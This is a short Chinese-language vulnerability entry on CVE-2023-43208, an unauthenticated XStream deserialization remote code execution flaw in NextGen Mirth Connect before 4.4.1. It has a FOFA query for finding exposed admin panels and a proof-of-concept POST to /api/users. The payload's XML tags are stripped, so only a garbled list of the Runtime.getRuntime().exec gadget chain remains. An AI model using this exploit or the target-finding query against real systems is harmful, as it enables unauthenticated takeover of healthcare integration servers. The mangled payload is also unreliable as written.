## NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208) NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。 ## fofa ``` title="Mirth Connect Administrator" ``` ## poc ``` POST /api/users HTTP/1.1 Host: X-Requested-With: OpenAPI Content-Type: application/xml abcd java.lang.Comparable java.lang.Runtime getMethod java.lang.String [Ljava.lang.Class; getRuntime invoke java.lang.Object [Ljava.lang.Object; exec java.lang.String 执行的命令 transform compareTo ```